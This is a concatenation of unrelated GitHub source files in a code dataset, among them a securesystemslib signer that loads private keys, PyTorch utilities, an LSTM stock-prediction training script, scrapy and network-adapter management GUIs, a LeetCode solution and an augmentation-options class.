from_priv_key_uri(\n cls,\n priv_key_uri: str,\n public_key: Key,\n secrets_handler: Optional[SecretsHandler] = None,\n ) -> \"Signer\":\n \"\"\"Factory constructor for a given private key URI\n\n Returns a specific Signer instance based on the private key URI and the\n supported uri schemes listed in SIGNER_FOR_URI_SCHEME.\n\n Args:\n priv_key_uri: URI that identifies the private key\n public_key: Key that is the public portion of this private key\n secrets_handler: Optional function that may be called if the\n signer needs additional secrets (like a PIN or passphrase).\n secrets_handler should return the requested secret string.\n\n Raises:\n ValueError: Incorrect arguments\n Other Signer-specific errors: These could include OSErrors for\n reading files or network errors for connecting to a KMS.\n \"\"\"\n\n scheme, _, _ = priv_key_uri.partition(\":\")\n if scheme not in SIGNER_FOR_URI_SCHEME:\n raise ValueError(f\"Unsupported private key scheme {scheme}\")\n\n signer = SIGNER_FOR_URI_SCHEME[scheme]\n return signer.from_priv_key_uri(\n priv_key_uri, public_key, secrets_handler\n )\n\n\nclass SSlibSigner(Signer):\n \"\"\"A securesystemslib signer implementation.\n\n Provides a sign method to generate a cryptographic signature with a\n securesystemslib-style rsa, ed25519 or ecdsa key. See keys module\n for the supported types, schemes and hash algorithms.\n\n SSlibSigners should be instantiated with Signer.from_priv_key_uri().\n These private key URI schemes are supported:\n * \"envvar:\":\n VAR is an environment variable with unencrypted private key content.\n envvar:MYPRIVKEY\n * \"file:?encrypted=[true|false]\":\n PATH is a file path to a file with private key content. If\n encrypted=true, the file is expected to have been created with\n securesystemslib.keys.encrypt_key().\n file:path/to/file?encrypted=true\n file:/abs/path/to/file?encrypted=false\n\n Attributes:\n key_dict:\n A securesystemslib-style key dictionary. This is an implementation\n detail, not part of public API\n \"\"\"\n\n ENVVAR_URI_SCHEME = \"envvar\"\n FILE_URI_SCHEME = \"file\"\n\n def __init__(self, key_dict: Dict):\n self.key_dict = key_dict\n\n @classmethod\n def from_priv_key_uri(\n cls,\n priv_key_uri: str,\n public_key: Key,\n secrets_handler: Optional[SecretsHandler] = None,\n ) -> \"SSlibSigner\":\n \"\"\"Constructor for Signer to call\n\n Please refer to Signer.from_priv_key_uri() documentation.\n\n Additionally raises:\n OSError: Reading the file failed with \"file:\" URI\n \"\"\"\n if not isinstance(public_key, SSlibKey):\n raise ValueError(f\"Expected SSlibKey for {priv_key_uri}\")\n\n uri = parse.urlparse(priv_key_uri)\n\n if uri.scheme == cls.ENVVAR_URI_SCHEME:\n # read private key from environment variable\n private = os.getenv(uri.path)\n if private is None:\n raise ValueError(f\"Unset env var for {priv_key_uri}\")\n\n elif uri.scheme == cls.FILE_URI_SCHEME:\n params = dict(parse.parse_qsl(uri.query))\n if \"encrypted\" not in params:\n raise ValueError(f\"{uri.scheme} requires 'encrypted' parameter\")\n\n # read private key (may be encrypted or not) from file\n with open(uri.path, \"rb\") as f:\n private = f.read().decode()\n\n if params[\"encrypted\"] != \"false\":\n if not secrets_handler:\n raise ValueError(\"encrypted key requires a secrets handler\")\n\n secret = secrets_handler(\"passphrase\")\n decrypted = sslib_keys.decrypt_key(private, secret)\n private = decrypted[\"keyval\"][\"private\"]\n\n else:\n raise ValueError(f\"SSlibSigner does not support {priv_key_uri}\")\n\n keydict = public_key.to_securesystemslib_key()\n keydict[\"keyval\"][\"private\"] = private\n return cls(keydict)\n\n def sign(self, payload: bytes) -> Signature:\n \"\"\"Signs a given payload by the key assigned to the SSlibSigner instance.\n\n Please see Signer.sign() documentation.\n\n Additionally raises:\n securesystemslib.exceptions.FormatError: Key argument is malformed.\n securesystemslib.exceptions.CryptoError, \\\n securesystemslib.exceptions.UnsupportedAlgorithmError:\n Signing errors.\n \"\"\"\n sig_dict = sslib_keys.create_signature(self.key_dict, payload)\n return Signature(**sig_dict)\n","repo_name":"Junochiu/securesystemslib","sub_path":"securesystemslib/signer/_signer.py","file_name":"_signer.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13588083472","text":"import torch\nimport numpy as np\nfrom typing import List\nfrom math import floor\n\n\ndef split_int_into_n(i: int, n: int) -> List[int]:\n \"\"\"Divides an integer i into n slots, where i is distributed as equally\n as possible across each slot.\n\n Args:\n i (int): number to be divided.\n n (int): number of slots.\n\n Returns:\n List[int]: list of numbers which sum to 1.\n \"\"\"\n r = i % n\n o = [floor(i / n) for _ in range(n)]\n idx = 0\n while r > 0:\n o[idx] += 1\n r -= 1\n idx += 1\n return o\n\n\ndef crop_to_size(X: torch.Tensor, output_size: list) -> torch.Tensor:\n \"\"\"Crops a tensor to the size given by list. Assumes the first two\n dimensions are the batch and channel dimensions.\n\n Args:\n X (torch.Tensor): torch Tensor to be cropped\n output_size (list): list with the output dimensions. Should be\n smaller or identical to the current dimensions and the list length\n should be len(X.shape)\n\n Returns:\n torch.Tensor: a resized torch Tensor\n \"\"\"\n sh = list(X.shape)[2:]\n diff = [i - j for i, j in zip(sh, output_size)]\n a = [x // 2 for x in diff]\n r = [i - j for i, j in zip(diff, a)]\n b = [i - j for i, j in zip(sh, r)]\n for i, (x, y) in enumerate(zip(a, b)):\n idx = torch.LongTensor(np.r_[x:y]).to(X.device)\n X = torch.index_select(X, i + 2, idx)\n return X\n\n\ndef unsqueeze_to_target(x: torch.Tensor, target: torch.Tensor, dim=-1):\n cur, tar = len(x.shape), len(target.shape)\n if cur < tar:\n for _ in range(tar - cur):\n x = x.unsqueeze(dim)\n return x\n\n\nclass SequentialWithArgs(torch.nn.Sequential):\n \"\"\"\n Modified Sequential module. The difference is that the forward takes\n arguments.\n \"\"\"\n\n def __init__(self, *args: torch.nn.Module):\n \"\"\"\n Args:\n modules (torch.nn.Module): module\n \"\"\"\n super(torch.nn.Sequential).__init__(*args)\n\n def forward(self, X: torch.Tensor, *args, **kwargs) -> torch.Tensor:\n for module in self:\n X = module(X, *args, **kwargs)\n return X\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"lib/modules/layers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"23952024014","text":"# Importing Libraries\r\nimport numpy as np # LIBRARY IMPORT FOR LINEAR ALGEBRA\r\nimport pandas as pd # LIBRARY IMPORT FOR DATA PROCESSING\r\nfrom sklearn.model_selection import train_test_split # MODULE IMPORT FOR DATA SPLITTING\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers,Sequential\r\nfrom tensorflow.keras.layers import Dense,LSTM, Dropout\r\n\r\n# YOUR IMPLEMENTATION\r\n# Thoroughly comment your code to make it easy to follow\r\n\r\nif __name__ == \"__main__\": \r\n # 1. load your training data\r\n #Loading Data set\r\n Stock_Data = pd.read_csv(\"./data/q2_dataset.csv\")\r\n store_data=np.zeros((1258,13))\r\n\r\n # The dataset was created in such a way to predict the next day opening price using the past 3 days Open, High, and Low prices and volume. \r\n # So each sample contains 12 features and 1 target. \r\n\r\n for i in range(len(store_data)-2):\r\n \r\n store_data[i][12]=Stock_Data.iloc[i+3][3] #target\r\n\r\n store_data[i][0]=Stock_Data.iloc[i+2][3] #open -1\r\n store_data[i][1]=Stock_Data.iloc[i+1][3] #open -2\r\n store_data[i][2]=Stock_Data.iloc[i][3] #open -3\r\n\r\n store_data[i][3]=Stock_Data.iloc[i+2][4] #High -1\r\n store_data[i][4]=Stock_Data.iloc[i+1][4] #High -2\r\n store_data[i][5]=Stock_Data.iloc[i][4] #High -3\r\n\r\n store_data[i][6]=Stock_Data.iloc[i+2][5] #Low -1\r\n store_data[i][7]=Stock_Data.iloc[i+1][5] #Low -2\r\n store_data[i][8]=Stock_Data.iloc[i][5] #Low -3\r\n\r\n store_data[i][9]=Stock_Data.iloc[i+2][2] #Volume -1\r\n store_data[i][10]=Stock_Data.iloc[i+1][2] #Volume -2\r\n store_data[i][11]=Stock_Data.iloc[i][2] #Volume -3\r\n\r\n col_names=['Open-1','Open-2','Open-3','High-1','High-2','High-3','Low-1','Low-2','Low-3','Volume-1','Volume-2','Volume-3','Target']\r\n\r\n df=pd.DataFrame(store_data[:-2,:],columns=col_names)\r\n data=df.drop(['Target'],axis=1)\r\n ran = 0\r\n #the dataset was randomized to create ‘train_data_RNN.csv’ and ‘test_data_RNN.csv.\r\n X_train, X_test, y_train, y_test = train_test_split(data, df['Target'], test_size=0.3, random_state = ran) \r\n train_data=pd.concat([X_train,y_train],axis=1)\r\n test_data=pd.concat([X_test,y_test],axis=1)\r\n # Commenting the exporting of ‘train_data_RNN.csv’ and ‘test_data_RNN.csv’\r\n # train_data.to_csv(r'./data/train_data_RNN.csv', index = False, header=True)\r\n # test_data.to_csv(r'./data/test_data_RNN.csv', index = False, header=True)\r\n\r\n #reading the train data\r\n Train_Data = pd.read_csv(\"./data/train_data_RNN.csv\")\r\n #creating the X_train\r\n X_train=Train_Data.drop(['Target'],axis=1)\r\n #creating y_train\r\n y_train=Train_Data['Target']\r\n\r\n #scaling the dataset using minmaxscaler\r\n scaler=MinMaxScaler(feature_range=(0,1))\r\n X_train=scaler.fit_transform(X_train)\r\n\r\n #numpy array conversion\r\n X_train=np.array(X_train)\r\n # reshape input to be [samples, time steps, features] which is required for LSTM\r\n X_train =X_train.reshape(X_train.shape[0],X_train.shape[1] , 1)\r\n\r\n\r\n\r\n # 2. Train your network\r\n model = Sequential()\r\n #adding LSTM layer with 50 LSTM units\r\n model.add(LSTM(50,input_shape=(X_train.shape[1],1),return_sequences=True))\r\n #adding LSTM layer with 150 LSTM units\r\n model.add(LSTM(150))\r\n #adding dense layer\r\n model.add(Dense(1,activation='linear'))\r\n\r\n #'mean_squared_error' has been used as loss function\r\n # Optimizer: Here adam optimizer has been used.\r\n # Adam is an adaptive learning rate optimization algorithm that’s been designed specifically for\r\n # training deep neural networks.\r\n\r\n model.compile(loss='mean_squared_error',optimizer='adam',metrics=['mae'])\r\n\r\n History = model.fit(X_train,y_train,epochs=600,batch_size=64,verbose=2)\r\n # \t\tMake sure to print your training loss within training to show progress\r\n # \t\tMake sure you print the final training loss\r\n print('The final training loss is ',History.history['loss'][-1])\r\n\r\n\r\n\r\n # 3. Save your model\r\n # Please uncomment the following line to save the model in the models directory\r\n model.save('./models/Group25_RNN_model.h5')","repo_name":"RavideepSingh15/ECE-657---Intelligent-System-Design","sub_path":"Assignment 3/train_RNN.py","file_name":"train_RNN.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1969933121","text":"import os\nimport re\nimport sympy as sp\nimport tkinter as tk\n\nfrom tkinter import filedialog\n\n\ndef process_if(file, line):\n\tglobal alg_list\n\t_if = _else = len(re.split(' y | o ', line))\n\tflag = True\n\tline = file.readline()\n\talg_list.append(line)\n\tline = line.lower()\n\twhile not line.startswith('fsi'):\n\t\tif line.startswith('sino'):\n\t\t\tflag = False\n\t\t\tline = file.readline()\n\t\t\talg_list.append(line)\n\t\t\tline = line.lower()\n\t\t\tcontinue\n\t\tif flag:\n\t\t\t_if = _if + 1\n\t\telse:\n\t\t\t_else = _else + 1\n\t\tline = file.readline()\n\t\talg_list.append(line)\n\t\tline = line.lower()\n\tif _if > _else:\n\t\tans = f'+{_if}'\n\telse:\n\t\tans = f'+{_else}'\n\treturn ans, file\n\n\ndef process_for(file, line):\n\tglobal alg_list\n\tinter = \"(\"\n\tfor_data = re.split(',|\\n', re.split('=', re.split(' ', line)[1])[1])\n\t\n\tif for_data[2].startswith('+'):\n\t\tli, ls, inc = for_data[0], for_data[1], for_data[2]\n\telif for_data[2].startswith('-'):\n\t\tli, ls, inc = for_data[1], for_data[0], for_data[2]\n\n\tline = file.readline()\n\talg_list.append(line)\n\tline = line.lower()\n\tlimits = f'(({ls}-{li}+1)/{inc[1:]})'\n\tcount = 0\n\n\twhile not line.startswith('fpara'):\n\t\tif line.startswith('para'):\n\t\t\tif count != 0:\n\t\t\t\tinter += f'+{count}'\n\t\t\tval, file = process_for(file, line)\n\t\t\tinter += val\n\t\t\tcount = 0\n\t\telif line.startswith('si'):\n\t\t\tif count != 0:\n\t\t\t\tinter += f'+{count}'\n\t\t\tval, file = process_if(file, line)\n\t\t\tinter += val\n\t\t\tcount = 0\n\t\telse:\n\t\t\tcount = count + 1\n\t\tline = file.readline()\n\t\talg_list.append(line)\n\t\tline = line.lower()\n\tif count != 0:\n\t\tinter += f'+{count}'\n\tinter += ')'\n\tans = f'+({limits}*{inter}+2*({limits}+1))'\n\treturn ans, file\n\n\ndef calculate():\n\tglobal answer1, answer2, alg_list, text1\n\ttext1.config(state=tk.NORMAL)\n\ttext1.delete('1.0', tk.END)\n\tfile_path = filedialog.askopenfilename()\n\tans = \"\"\n\tans_simp = \"\"\n\talg_list = []\n\twith open(file_path, 'r') as f:\n\t\tans = \"\"\n\t\tline = f.readline()\n\t\talg_list.append(line)\n\t\tline = line.lower()\n\t\tcount = 0\n\t\twhile not line.startswith('pare'):\n\t\t\tif line.startswith('inicio'):\n\t\t\t\tline = f.readline()\n\t\t\t\talg_list.append(line)\n\t\t\t\tline = line.lower()\n\t\t\t\tcontinue\n\t\t\telif line.startswith('si'):\n\t\t\t\tif count != 0:\n\t\t\t\t\tans += f'+{count}'\n\t\t\t\tval, f = process_if(f, line)\n\t\t\t\tans += val\n\t\t\t\tcount = 0\n\t\t\telif line.startswith('para'):\n\t\t\t\tif count != 0:\n\t\t\t\t\tans += f'+{count}'\n\t\t\t\tval, f = process_for(f, line)\n\t\t\t\tans += val\n\t\t\t\tcount = 0\n\t\t\telse:\n\t\t\t\tcount = count + 1\n\t\t\tline = f.readline()\n\t\t\talg_list.append(line)\n\t\t\tline = line.lower()\n\t\tif count != 0:\n\t\t\tans += f'+{count}'\n\t\tans_simp = 'T(n) = ' + str(sp.simplify(ans)).replace('**', '^')\n\t\tans = 'T(n) = ' + ans\n\t\tprint(ans)\n\tfor alg in alg_list:\n\t\ttext1.insert(tk.END, alg)\n\ttext1.config(state=tk.DISABLED)\n\tanswer1.set(ans)\n\tanswer2.set(ans_simp)\n\t\n\ndef main():\n\tglobal answer1, answer2, alg_list, text1\n\troot = tk.Tk()\n\troot.title(\"Calculo del T(n)\")\n\troot.geometry(\"600x700\")\n\troot.grid_columnconfigure(0, weight=1)\n\n\tsep_text = \"---------------------------------------------------------------------------------------------\"\n\tsep_font = ('lato', 12)\n\n\tsep0 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep0.pack()\n\n\ttitlelabel = tk.Label(root, text=\"Calculo del T(n)\", font=('lato', 14, 'bold'))\n\ttitlelabel.pack()\n\n\tsep1 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep1.pack()\n\n\tbutton1 = tk.Button(root, text=\"Seleccionar Archivo\", command=calculate, font=('lato', 10))\n\tbutton1.pack()\n\n\tsep2 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep2.pack()\n\n\tanswer1 = tk.StringVar()\n\tanswer1.set(\"\")\n\tanswer2 = tk.StringVar()\n\tanswer2.set(\"\")\n\n\tnored = tk.Label(root, text='T(n) sin simplificar', font=('lato', 11))\n\tnored.pack()\n\n\tsep3 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep3.pack()\n\n\tlabel1 = tk.Label(root, textvariable=answer1, font=('consolas', 11), wraplength=550)\n\tlabel1.pack()\n\n\tsep4 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep4.pack()\n\n\tred = tk.Label(root, text='T(n) simplificado', font=('lato', 11))\n\tred.pack()\n\n\tsep5 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep5.pack()\n\n\tlabel2 = tk.Label(root, textvariable=answer2, font=('consolas', 11), wraplength=550)\n\tlabel2.pack()\n\n\tsep6 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep6.pack()\n\n\talglabel = tk.Label(root, text=\"Algoritmo\", font=('lato', 11))\n\talglabel.pack()\n\n\tscrollbar1 = tk.Scrollbar(root)\n\ttext1 = tk.Text(root, height=15, font=('consolas', 11))\n\tscrollbar1.pack(side=tk.RIGHT)\n\ttext1.pack(side=tk.LEFT, fill=tk.X)\n\tscrollbar1.config(command=text1.yview)\n\ttext1.config(yscrollcommand=scrollbar1.set)\n\ttext1.config(state=tk.DISABLED)\n\n\troot.mainloop()\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"EddAngulo/algorithms_202030_final_project","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24113811378","text":"from scrapy import cmdline\nimport os\n\n# cmdline.execute(\"scrapy crawlall\".split())\n# cmdline.execute(\"scrapy crawl dzh -o dzh.csv\".split())\n\nfrom tkinter import *\nimport time\n\nfrom tkinter import *\n\n\ndef callback():\n var.set('程序正在运行,请稍等...')\n #cmdline.execute(\"scrapy crawlall\".split())\n #cmdline.execute(\"scrapy crawl dzh -o dzh.csv\".split())\n #cmdline.execute(\"scrapy crawl detail\".split())\n\n os.system(\"scrapy crawlall -s CLOSESPIDER_TIMEOUT=120\")\n os.system(\"scrapy crawl dzh -o dzh.csv\")\n os.system(\"scrapy crawl detail\")\n os.system(\"scrapy crawl pbdetail\")\n\nroot = Tk()\n\nframe1 = Frame(root) # Frame 框架控件;在屏幕上显示一个矩形区域,多用来作为容器\nframe2 = Frame(root)\n\ntodayDate = time.strftime('%Y-%m-%d', time.localtime(time.time()))\nvar = StringVar() # 设置字符串\nvar.set(\"今天的日期是:\"+todayDate+\"\\n 要开始并行运行所有爬虫吗?\")\n\ntextLabel = Label(frame1,\n textvariable=var,\n justify=LEFT)\n\ntextLabel.pack(side=LEFT)\n\ntheButton = Button(frame2, text=\"爬取全部内容\", command=callback) # 定义一个按钮\ntheButton.pack()\n\nframe1.pack(padx=10, pady=10) # 定义位置\nframe2.pack(padx=50, pady=50)\n\nmainloop()","repo_name":"guoyuqing666/mdas_online","sub_path":"SpiderObject/SpiderObject/startAllSpiders.py","file_name":"startAllSpiders.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"33846147897","text":"class Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n # nums3 = nums1[:m]\n # nums1[:] = []\n # i, j = 0, 0\n # while i < m and j < n:\n # if nums3[i] > nums2[j]:\n # nums1.append(nums2[j])\n # j += 1\n # else:\n # nums1.append(nums3[i])\n # i += 1\n # if i < m:\n # nums1[i + j:] = nums3[i:]\n # if j < n:\n # nums1[i + j:] = nums2[j:]\n # print(nums1)\n\n p1 = m - 1\n p2 = n - 1\n p = m + n - 1\n while p1 >= 0 and p2 >= 0:\n if nums1[p1] <= nums2[p2]:\n nums1[p] = nums2[p2]\n p -= 1\n p2 -= 1\n else:\n nums1[p] = nums1[p1]\n p1 -= 1\n p -= 1\n nums1[:p2 + 1] = nums2[:p2 + 1]\n print(nums1)\n\n\nif __name__ == \"__main__\":\n # nums1 = [4, 0, 0, 0, 0, 0]\n # m = 1\n # nums2 = [1, 2, 3, 5, 6]\n # n = 5\n nums1 = [0]\n m = 0\n nums2 = [1]\n n = 1\n print(Solution().merge(nums1, m, nums2, n))\n","repo_name":"simplynaive/LeetCode","sub_path":"88. Merge Sorted Array.py","file_name":"88. Merge Sorted Array.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4594515017","text":"\"\"\"\nLIBRAIRIES\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\n\n\n# PRESENTATION\n# Couleurs\n\nfrom colorama import Fore, Back, Style\n\n# DEBUG FUNCTIONS\n# os.sys(\"pause\")\n\n\"\"\"\nWindows Adapter Lib\n\"\"\"\nimport wmi\n\n\"\"\"\nGENERAL\n\"\"\"\n# Sleep\nimport time\n# OS\nimport os\n# UAC\nfrom elevate import elevate\n\n\"\"\"\n????????????\n\"\"\"\n\nimport regex\n\n\"\"\"\nCLI Libraries\n\"\"\"\n\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\nfrom PyInquirer import Validator, ValidationError\nfrom pprint import pprint\n\n\n\n\"\"\"\nCOOL INSANE TITLE\n\"\"\"\n\nfrom pyfiglet import Figlet\n\n\n\"\"\"\nCLEAR FUNCTION\n\"\"\"\n\nclear = lambda: os.system('cls')\n\n\n\"\"\"\nCartes Dispos\n\"\"\"\n\ndef ListAvailableNetworkCards():\n return [conn.NetConnectionID for conn in wmi.WMI().query(\"select * from Win32_NetworkAdapter\") if conn.NetConnectionID ]\n\n\n\n\n\"\"\"\nMENU\n\"\"\"\n\n\n\ndef menu():\n style = style_from_dict({\n Token.QuestionMark: '#E91E63 bold',\n Token.Selected: '#673AB7 bold',\n Token.Instruction: '', # default\n Token.Answer: '#2196f3 bold',\n Token.Question: '',\n })\n\n\n cartes_dispo = ListAvailableNetworkCards()\n cartes_dispo.sort()\n cartes_dispo.append('CANCEL')\n\n # print(cartes_dispo)\n\n questions=[\n\n {\n 'type': 'list',\n 'name': 'app_choice',\n 'message': 'What do you want to do ?',\n 'choices': ['Reboot Network Card', 'Change Network Card', 'Choose a Network Card', 'Enable a Network Card', 'Disable a Network Card','Quit']\n\n\n },\n\n\n\n\n # >>>> Adapter List <<<<\n\n\n # Redémarrer\n\n {\n 'type': 'list',\n 'name': 'adapter name',\n 'message': 'Pick the Network Card you want to reboot : (entrer CANCEL to quit)',\n 'choices': cartes_dispo,\n #'default': cartes_dispo[1],\n 'when': lambda answers: answers['app_choice'] == 'Reboot Network Card'\n },\n\n\n #\n {\n 'type': 'list',\n 'name': 'choose_adapter',\n 'message': 'Pick the Network Card you want to enable :',\n 'choices': cartes_dispo,\n 'when': lambda answers: answers['app_choice'] == 'Choose a Network Card'\n },\n\n\n # Changer\n\n\n {\n 'type': 'list',\n 'name': 'change_adapter_old',\n 'message': 'pick the Network Card you want to disable : ',\n 'choices': cartes_dispo,\n 'when': lambda answers: answers['app_choice'] == 'Change Network Card'\n },\n\n {\n 'type': 'list',\n 'name': 'change_adapter_new',\n 'message': 'pick the Network Card you want to enable : ',\n 'choices': cartes_dispo,\n 'when': lambda answers: answers['app_choice'] == 'Change Network Card' and answers['change_adapter_old'] != 'CANCEL'\n },\n\n\n # Eteindre\n\n {\n 'type': 'list',\n 'name': 'adapter_off',\n 'message': 'pick the Network Card you want to disable : ',\n 'choices': cartes_dispo,\n 'when': lambda answers: answers['app_choice'] == 'Disable a Network Card'\n },\n\n\n # Allumer\n\n {\n 'type': 'list',\n 'name': 'adapter_on',\n 'message': 'pick the Network Card you want to enable',\n 'choices': cartes_dispo,\n 'when': lambda answers: answers['app_choice'] == 'Enable a Network Card'\n },\n\n # >>>> Confirms <<<<\n\n {\n 'type': 'confirm',\n 'name': 'change_confirm',\n 'message': 'Are you sure you want to reboot it ?',\n 'default': False,\n 'when': lambda answers: answers['app_choice'] == 'Change Network Card' and answers['change_adapter_old'] != 'CANCEL' and answers['change_adapter_new'] != 'CANCEL'\n },\n\n\n\n #{\n # 'type': 'confirm',\n # 'name': 'relancer_confirm',\n # 'message': 'souhaitez vous redémarrer la carte réseau ?',\n # 'default': False,\n # 'when': lambda answers: answers['app_choice'] == 'Reboot Network Card' and answers['adapter name'] != 'CANCEL'\n #},\n\n {\n 'type': 'confirm',\n 'name': 'quit_confirm',\n 'message': 'Do you want to Exit ?',\n 'default': False,\n 'when': lambda answers: answers['app_choice'] == 'Quit'\n }\n\n\n\n ]\n\n answers = prompt(questions, style=style)\n\n return answers\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nMENU CONSEQUENCES / LAUNCHER\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef action():\n\n clear()\n # print([conn.NetConnectionID for conn in wmi.WMI().query(\"select * from Win32_NetworkAdapter\") if conn.NetConnectionID ])\n f = Figlet(font='slant')\n print(f.renderText('NETWORKED'))\n\n print(Fore.CYAN + \"A simple toolbox to manage network cards, written in Python 3\\n\\n \" + Fore.WHITE)\n\n print(\"--- \" + Fore.YELLOW + \"Github/allemand-instable\" + Fore.WHITE + \" ---\\n\\n\\n\")\n\n answer = menu()\n\n print(answer)\n if answer['app_choice'] == 'Reboot Network Card' :\n if answer['adapter name'] != 'CANCEL': #and answer['relancer_confirm'] == True :\n carte = answer['adapter name']\n relancer_carte(carte)\n\n\n if answer['app_choice'] == 'Enable a Network Card' and answer['adapter_on'] != 'CANCEL' :\n carte = answer['adapter_on']\n activer_carte(carte)\n\n\n if answer['app_choice'] == 'Disable a Network Card' and answer['adapter_off'] != 'CANCEL' :\n carte = answer['adapter_off']\n desactiver_carte(carte)\n\n\n # CHANGER LA CARTE RESEAU\n\n if answer['app_choice'] == 'Change Network Card' :\n if answer['change_adapter_old'] != 'CANCEL' :\n if answer['change_adapter_new'] != 'CANCEL' :\n if answer['change_confirm'] == True :\n ancienne_carte = answer['change_adapter_old']\n nouvelle_carte = answer['change_adapter_new']\n changer_carte(ancienne_carte, nouvelle_carte)\n\n if answer['app_choice'] == 'Quit' and answer['quit_confirm'] == False :\n return True\n\n if answer['app_choice'] == 'Choose a Network Card' and answer['choose_adapter'] == 'CANCEL' :\n return True\n\n if answer['app_choice'] == 'Choose a Network Card' and answer['choose_adapter'] != 'CANCEL' :\n carte = answer[\"choose_adapter\"]\n choisir_carte(carte)\n\n\n if answer[\"app_choice\"] == 'Quit' and answer[\"quit_confirm\"] == True :\n clear()\n return False\n\n\n return True\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nLOOP FUNCTION\n\"\"\"\n\n\n\n\n\n\ndef run():\n running = True\n while running :\n #print(running)\n running = action()\n print(running)\n return\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nFONCTIONS CARTE RESEAU\n\"\"\"\n\n\n\ndef changer_carte(ancienne_carte, nouvelle_carte):\n desactiver_carte(ancienne_carte)\n activer_carte(nouvelle_carte)\n return\n\ndef desactiver_carte(carte):\n c=wmi.WMI()\n o=c.query(\"select * from Win32_NetworkAdapter\")\n #print(c)\n #print(o)\n for conn in o :\n #print(conn.NetConnectionID)\n #print(conn.Caption + \" - \" + conn.Description)\n if conn.NetConnectionID == carte:\n if conn.NetEnabled:\n conn.Disable()\n\n else:\n print(carte, ' est déjà désactivée')\n # conn.Enable()\n return\n\ndef activer_carte(carte):\n c=wmi.WMI()\n o=c.query(\"select * from Win32_NetworkAdapter\")\n #print(c)\n #print(o)\n for conn in o :\n #print(conn.NetConnectionID)\n #print(conn.Caption + \" - \" + conn.Description)\n if conn.NetConnectionID == carte:\n if conn.NetEnabled:\n #conn.Disable()\n print(carte, ' est déjà activée')\n else:\n conn.Enable()\n return\n\n\n\ndef relancer_carte(carte):\n print(\"ok\")\n desactiver_carte(carte)\n activer_carte(carte)\n return\n\n\n\n\ndef choisir_carte(carte_choisie):\n list = [conn.NetConnectionID for conn in wmi.WMI().query(\"select * from Win32_NetworkAdapter\") if conn.NetConnectionID ]\n for carte in list :\n if carte != carte_choisie :\n desactiver_carte(carte)\n else :\n activer_carte(carte)\n return\n\n\n\n\n\n\n\n\n\n\"\"\"\nMAIN FUNCTION\n\"\"\"\n\n\ndef main():\n run()\n return 0\n\n# Définie la main\nif __name__ == \"__main__\" :\n elevate()\n main()\n","repo_name":"allemand-instable/Networked","sub_path":"old/v1/Networked.py","file_name":"Networked.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19949922718","text":"\"\"\"Contains methods for augmentation.\"\"\"\nfrom typing import NamedTuple\nfrom imgaug import augmenters\n\n# See\n# https://github.com/aleju/imgaug\n# for visual context\n\n\nclass AugmentationOptions(NamedTuple):\n \"\"\"Which augmentations to turn on or off.\"\"\"\n\n channel_shuffle: bool = False\n brightness: bool = False\n gaussian_noise: bool = False\n dropout_boxes: bool = False\n salt_and_pepper: bool = False\n jpeg_artifacts: bool = False\n gaussian_blur: bool = False\n vertical_flip: bool = False\n distortion: bool = False\n rotate: bool = False\n scale_and_translate: bool = False\n color: bool = False\n\n @classmethod\n def all_activated(cls):\n \"\"\"Get all activated augmentation options.\"\"\"\n true_array = [True for _ in range(12)]\n return cls(*true_array)\n\n def to_dict(self) -> dict:\n \"\"\"Convert options to dumpable dictionary.\"\"\"\n return {\n \"channel_shuffle\": self.channel_shuffle,\n \"brightness\": self.brightness,\n \"gaussian_noise\": self.gaussian_noise,\n \"dropout_boxes\": self.dropout_boxes,\n \"salt_and_pepper\": self.salt_and_pepper,\n \"jpeg_artifacts\": self.jpeg_artifacts,\n \"vertical_flip\": self.vertical_flip,\n \"distortion\": self.distortion,\n \"rotate\": self.rotate,\n \"scale_and_translate\": self.scale_and_translate,\n \"color\": self.color,\n }\n\n @classmethod\n def from_dict(cls, dictionary: dict):\n \"\"\"Restore augmentation options from dictionary.\"\"\"\n return cls(**dictionary)\n\n def activated_count(self) -> int:\n \"\"\"Count how many augmentations are activated.\"\"\"\n return (\n self.channel_shuffle * 1\n + self.brightness * 1\n + self.gaussian_noise * 1\n + self.dropout_boxes * 1\n + self.salt_and_pepper * 1\n + self.jpeg_artifacts * 1\n + self.vertical_flip * 1\n + self.distortion * 1\n + self.rotate * 1\n + 